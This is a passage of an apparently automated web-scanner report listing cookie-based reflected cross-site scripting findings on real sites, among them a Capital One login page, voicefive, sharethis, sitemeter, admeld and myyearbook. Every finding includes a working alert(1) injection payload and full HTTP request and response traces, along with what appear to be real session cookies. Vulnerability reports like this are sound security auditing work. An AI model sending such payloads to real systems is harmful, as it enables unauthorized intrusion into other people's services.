The value of the ar_p101983071 cookie is copied into the HTML document as plain text between tags. The payload 5dffa<script>alert(1)</script>69beef29e58 was submitted in the ar_p101983071 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&5dffa<script>alert(1)</script>69beef29e58; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258; BMX_3PC=1; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:37 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:37 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
hu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:27 2011&prad=1355335&arc=1498970&', "ar_p101983071": 'exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&5dffa<script>alert(1)</script>69beef29e58' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

3.126. http://ar.voicefive.com/bmx3/broker.pli [ar_p110040101 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p110040101 cookie is copied into the HTML document as plain text between tags. The payload c95f7<script>alert(1)</script>6cac0769b07 was submitted in the ar_p110040101 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&c95f7<script>alert(1)</script>6cac0769b07; BMX_G=method->-1,ts->1311271258; BMX_3PC=1; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:38 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=2&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:38 2011&c95f7<script>alert(1)</script>6cac0769b07=&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:38 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
tExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&', "ar_p110040101": 'exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&c95f7<script>alert(1)</script>6cac0769b07', "ar_p101983071": 'exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.c
...[SNIP]...

3.127. http://ar.voicefive.com/bmx3/broker.pli [ar_p87077372 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p87077372 cookie is copied into the HTML document as plain text between tags. The payload f606e<script>alert(1)</script>aeace3a3569 was submitted in the ar_p87077372 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&f606e<script>alert(1)</script>aeace3a3569; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258; BMX_3PC=1; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:36 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
ll};})();}COMSCORE.BMX.Broker.Cookies={ "BMX_G": 'method->-1,ts->1311271258', "ar_p87077372": 'exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&f606e<script>alert(1)</script>aeace3a3569', "UID": '39460fd-77.67.87.8-1311271269', "BMX_3PC": '1', "ar_p98294060": 'exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&', "ar_p110040101": 'exp=2&in
...[SNIP]...

3.128. http://ar.voicefive.com/bmx3/broker.pli [ar_p98294060 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p98294060 cookie is copied into the HTML document as plain text between tags. The payload e39ca<script>alert(1)</script>0ee60f18c48 was submitted in the ar_p98294060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&e39ca<script>alert(1)</script>0ee60f18c48; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258; BMX_3PC=1; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:36 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
ad=124094&arc=184537%3F684451&', "UID": '39460fd-77.67.87.8-1311271269', "BMX_3PC": '1', "ar_p98294060": 'exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&e39ca<script>alert(1)</script>0ee60f18c48', "ar_p110040101": 'exp=2&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:27 2011&prad=1355335&arc=1498970&', "ar_p101983071": 'exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:4
...[SNIP]...

3.129. http://seg.sharethis.com/getSegment.php [__stid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload bbafa<script>alert(1)</script>202899b8423 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.uscgnews.com%2Fgo%2Fdoc%2F786%2F1135035%2F&jsref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&rnd=1311370085769 HTTP/1.1
Host: seg.sharethis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.uscgnews.com/go/doc/786/1135035/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==bbafa<script>alert(1)</script>202899b8423

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Fri, 22 Jul 2011 21:28:00 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 2615


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspjoE3JR6aX8hTKEPglAg==bbafa<script>alert(1)</script>202899b8423
userid:
</div>
...[SNIP]...

3.130. https://servicing.capitalone.com/c1/login.aspx [VS_COOKIE cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://servicing.capitalone.com
Path:   /c1/login.aspx

Issue detail

The value of the VS_COOKIE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65e16"-alert(1)-"55101615765 was submitted in the VS_COOKIE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c1/login.aspx HTTP/1.1
Host: servicing.capitalone.com
Connection: keep-alive
Referer: http://www.capitalone.com/contactus/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4; mbox=check#true#1311366883|session#1311366822807-148063#1311368683|disable#browser%20timeout#1311370442; ASP.NET_SessionId=t40lmqeexjtjkkvhq4caiv55; COUNTRYCODE=USA; TestCookie=OK; ssotgt=f2eos; C1_REDIRECT=; SSP_Params=; VS_COOKIE=Login65e16"-alert(1)-"55101615765; bank=dotcom

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Date: Fri, 22 Jul 2011 20:43:41 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: VS_COOKIE=LoginError; domain=capitalone.com; path=/;HttpOnly
Vary: Accept-Encoding
Content-Length: 13852


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="HTMLHEAD">
   <meta http-equiv="Cache-Control" content="no-cache, no-sto
...[SNIP]...
<script language="JavaScript">var attributes = new Array();attributes[0] = "appname=EOS";attributes[1] = "PageName=LoginError";attributes[2] = "PreviousPage=Login65e16"-alert(1)-"55101615765";var appScriptUri = "/C1/Themes/TopTabMenu/Script/null.js";writeAnalytic(attributes, appScriptUri);</script>
...[SNIP]...

3.131. http://sm6.sitemeter.com/js/counter.asp [IP cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sm6.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f4ae"%3balert(1)//edcd6dc1283 was submitted in the IP cookie. This input was echoed as 6f4ae";alert(1)//edcd6dc1283 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.asp?site=sm6damnhippy HTTP/1.1
Host: sm6.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E2436f4ae"%3balert(1)//edcd6dc1283

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Jul 2011 13:43:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7294
Content-Type: application/x-javascript
Expires: Sat, 23 Jul 2011 13:53:20 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.2436f4ae";alert(1)//edcd6dc1283";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

3.132. http://sm6.sitemeter.com/js/counter.js [IP cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sm6.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 914da"%3balert(1)//2b32c6424b3 was submitted in the IP cookie. This input was echoed as 914da";alert(1)//2b32c6424b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=sm6damnhippy HTTP/1.1
Host: sm6.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E243914da"%3balert(1)//2b32c6424b3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Jul 2011 13:19:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7294
Content-Type: application/x-javascript
Expires: Sat, 23 Jul 2011 13:29:40 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243914da";alert(1)//2b32c6424b3";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

3.133. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220 [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3487"><script>alert(1)</script>ec6aea0cfca was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514a3487"><script>alert(1)</script>ec6aea0cfca; __qca=P0-1342016851-1308225219551; D41U=3ldWxSUW5smmT8Cr1TVsp8odr2wpaUd4kIG9UWzIHns3qOaGxdAxaGw

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1878
Content-Type: text/html
Date: Sat, 23 Jul 2011 13:48:55 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<script type="text/javascript">
document.write
...[SNIP]...
<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514a3487"><script>alert(1)</script>ec6aea0cfca&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel">
...[SNIP]...

3.134. http://www.myyearbook.com/advertising/default.php [MYB_TARGET cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /advertising/default.php

Issue detail

The value of the MYB_TARGET cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6cc0</script><script>alert(1)</script>8e6a735c675 was submitted in the MYB_TARGET cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=d6cc0</script><script>alert(1)</script>8e6a735c675; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:43 GMT
Server: Apache
Content-Length: 827
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.20.154

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
